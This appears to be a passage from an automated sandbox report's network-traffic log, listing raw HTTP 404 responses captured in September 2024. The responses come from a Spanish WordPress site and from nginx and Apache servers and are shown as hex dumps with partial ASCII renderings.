            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Sep 2024 11:54:07 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://mgmasistencia.com/wp-json/>; rel="https://api.w.org/"Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 63 65 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 20 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 50 c3 a1 67 69 6e 61 20 6e 6f 20 65 6e 63 6f 6e 74 72 61 64 61 20 26 23 38 32 31 31 3b 20 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 20 26 72 61 71 75 6f 3b 20 46 65 65 64 20 64 65 20 6c 6f 73 20 63 6f 6d 65 6e 74 61 72 69 6f 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Sep 2024 11:54:09 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://mgmasistencia.com/wp-json/>; rel="https://api.w.org/"Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 63 65 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 20 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 50 c3 a1 67 69 6e 61 20 6e 6f 20 65 6e 63 6f 6e 74 72 61 64 61 20 26 23 38 32 31 31 3b 20 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 20 26 72 61 71 75 6f 3b 20 46 65 65 64 20 64 65 20 6c 6f 73 20 63 6f 6d 65 6e 74 61 72 69 6f 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 03 Sep 2024 11:54:15 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 62 31 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 c1 0a c2 30 10 44 ef 82 ff b0 7e 40 1a 23 c5 53 c8 45 14 3c e8 c5 2f 48 dd b5 09 a4 1b 89 11 ec df 9b 6a 0b e2 d9 a3 c7 9d 7d 33 0c a3 5d ee 82 99 cf b4 23 8b 46 67 9f 03 99 7a 59 c3 31 66 d8 c5 3b a3 96 6f 51 cb 17 52 d0 26 62 3f 58 ce c4 99 92 d1 4e 7d 3b 8a a2 e5 f8 1e b2 0b 34 5e dc 7a 7e 48 55 ad d6 95 fa 44 e4 14 2a a7 42 0b 21 c0 c2 d5 22 7a 6e 21 47 40 7f b3 4d 20 38 9c f6 5b b0 8c b0 71 29 76 04 97 e4 89 31 f4 40 29 c5 54 1c 2d 81 10 43 c1 7f c4 2f b7 78 02 1a 70 c3 f4 2b 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: b10D~@#SE</Hj}3]#FgzY1f;oQR&b?XN};4^z~HUD*B!"zn!G@M 8[q)v1@)T-C/xp+0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 03 Sep 2024 11:54:18 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 62 31 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 c1 0a c2 30 10 44 ef 82 ff b0 7e 40 1a 23 c5 53 c8 45 14 3c e8 c5 2f 48 dd b5 09 a4 1b 89 11 ec df 9b 6a 0b e2 d9 a3 c7 9d 7d 33 0c a3 5d ee 82 99 cf b4 23 8b 46 67 9f 03 99 7a 59 c3 31 66 d8 c5 3b a3 96 6f 51 cb 17 52 d0 26 62 3f 58 ce c4 99 92 d1 4e 7d 3b 8a a2 e5 f8 1e b2 0b 34 5e dc 7a 7e 48 55 ad d6 95 fa 44 e4 14 2a a7 42 0b 21 c0 c2 d5 22 7a 6e 21 47 40 7f b3 4d 20 38 9c f6 5b b0 8c b0 71 29 76 04 97 e4 89 31 f4 40 29 c5 54 1c 2d 81 10 43 c1 7f c4 2f b7 78 02 1a 70 c3 f4 2b 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: b10D~@#SE</Hj}3]#FgzY1f;oQR&b?XN};4^z~HUD*B!"zn!G@M 8[q)v1@)T-C/xp+0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 03 Sep 2024 11:54:20 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 62 31 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 c1 0a c2 30 10 44 ef 82 ff b0 7e 40 1a 23 c5 53 c8 45 14 3c e8 c5 2f 48 dd b5 09 a4 1b 89 11 ec df 9b 6a 0b e2 d9 a3 c7 9d 7d 33 0c a3 5d ee 82 99 cf b4 23 8b 46 67 9f 03 99 7a 59 c3 31 66 d8 c5 3b a3 96 6f 51 cb 17 52 d0 26 62 3f 58 ce c4 99 92 d1 4e 7d 3b 8a a2 e5 f8 1e b2 0b 34 5e dc 7a 7e 48 55 ad d6 95 fa 44 e4 14 2a a7 42 0b 21 c0 c2 d5 22 7a 6e 21 47 40 7f b3 4d 20 38 9c f6 5b b0 8c b0 71 29 76 04 97 e4 89 31 f4 40 29 c5 54 1c 2d 81 10 43 c1 7f c4 2f b7 78 02 1a 70 c3 f4 2b 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: b10D~@#SE</Hj}3]#FgzY1f;oQR&b?XN};4^z~HUD*B!"zn!G@M 8[q)v1@)T-C/xp+0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 03 Sep 2024 11:54:23 GMTContent-Type: text/htmlContent-Length: 555Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.1</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Sep 2024 11:54:29 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Sep 2024 11:54:31 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Sep 2024 11:54:34 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Sep 2024 11:54:37 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Sep 2024 11:54:42 GMTServer: ApacheContent-Length: 13840Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 